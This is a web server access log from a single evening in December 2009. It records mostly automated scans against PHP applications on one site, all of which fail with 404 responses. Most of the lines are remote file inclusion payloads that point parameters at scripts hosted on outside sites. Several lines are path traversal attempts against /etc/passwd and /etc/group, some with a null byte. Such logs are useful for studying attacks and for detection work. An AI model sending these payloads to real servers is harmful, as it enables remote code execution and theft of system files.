67.19.51.194 - - [20/Dec/2009:18:21:00 -0800] "GET /logs/senetman/html/index.php?page=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:18:21:04 -0800] "GET /logs/access_090601.log/senetman/html/index.php?page=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:21:09 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:21:09 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:21:09 -0800] "GET /logs/access_090706.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:21:19 -0800] "GET /logs/access_090921.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:21:33 -0800] "GET /logs/access_090706.log//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:21:33 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:21:33 -0800] "GET /logs//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:18:22:38 -0800] "GET /logs/access_091109.log//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:18:23:21 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:18:23:21 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:18:23:22 -0800] "GET /logs/access_090706.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:18:23:38 -0800] "GET /logs/access_090824.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:18:23:52 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:24:13 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:24:14 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.207.51 - - [20/Dec/2009:18:25:15 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:18:25:53 -0800] "GET /logs/access_091012.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [20/Dec/2009:18:26:41 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:09 -0800] "GET / HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:10 -0800] "GET / HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:10 -0800] "GET /?N=D HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:11 -0800] "GET /?M=A HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:11 -0800] "GET / HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:12 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:13 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:13 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:14 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:14 -0800] "GET /?N=A HTTP/1.1" 200 1048 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:14 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Python-urllib/2.4" "www.galf.org"
204.15.80.50 - - [20/Dec/2009:18:27:15 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "Python-urllib/2.4" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:31:39 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:31:39 -0800] "GET /logs/access_091026.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:31:39 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:32:03 -0800] "GET /logs/access_090629.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:32:21 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:32:24 -0800] "GET /logs/access_090831.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:32:24 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:32:32 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:32:36 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:32:36 -0800] "GET /logs/access_090831.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:33:36 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:33:36 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:33:39 -0800] "GET /logs/access_090831.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:33:42 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:33:43 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:33:48 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:33:49 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:33:49 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:33:50 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:33:54 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:33:54 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:33:54 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:35:44 -0800] "GET /logs/access_090831.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:35:48 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:35:48 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:36:08 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:36:08 -0800] "GET /logs/access_090831.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:36:08 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:36:25 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:36:25 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:36:26 -0800] "GET /logs/access_090706.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:18:36:49 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:18:36:49 -0800] "GET /logs/access_091026.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:18:36:49 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:18:36:49 -0800] "GET /logs/access_090629.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:18:37:24 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:37:25 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:37:27 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:37:35 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.187.91.50 - - [20/Dec/2009:18:37:47 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:37:48 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:37:56 -0800] "GET /logs/access_090706.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:18:38:55 -0800] "GET /logs/access_090706.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:18:40:18 -0800] "GET /logs/access_091026.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:18:40:22 -0800] "GET /logs/access_090629.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:27 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:27 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:27 -0800] "GET /logs/access_091130.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:27 -0800] "GET /logs/access_090907.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:29 -0800] "GET /logs/access_091005.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:30 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:30 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:34 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:35 -0800] "GET /logs/access_090921.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:35 -0800] "GET /logs/access_090831.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:41 -0800] "GET /logs/access_090824.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:42:41 -0800] "GET /logs/access_090713.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:43:00 -0800] "GET /logs/access_091130.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [20/Dec/2009:18:43:01 -0800] "GET /logs/access_090907.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.6.111.62 - - [20/Dec/2009:18:43:32 -0800] "GET /main.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
201.6.111.62 - - [20/Dec/2009:18:43:32 -0800] "GET /logs/main.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:44:13 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:44:13 -0800] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:44:13 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.123 - - [20/Dec/2009:18:44:26 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.0" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:44:27 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:44:51 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:44:51 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:44:51 -0800] "GET /logs/access_090921.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:45:34 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:45:34 -0800] "GET /logs/access_091026.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:45:34 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:45:58 -0800] "GET /logs/access_090629.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:46:33 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:46:34 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:46:34 -0800] "GET /logs/access_090921.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:48:20 -0800] "GET /logs/access_090921.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:48:20 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:48:20 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:48:31 -0800] "GET /logs/access_090921.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:48:31 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:48:31 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:49:35 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:49:36 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:51:58 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:51:58 -0800] "GET /logs/access_090629.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:51:58 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:52:00 -0800] "GET /logs/access_090629.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
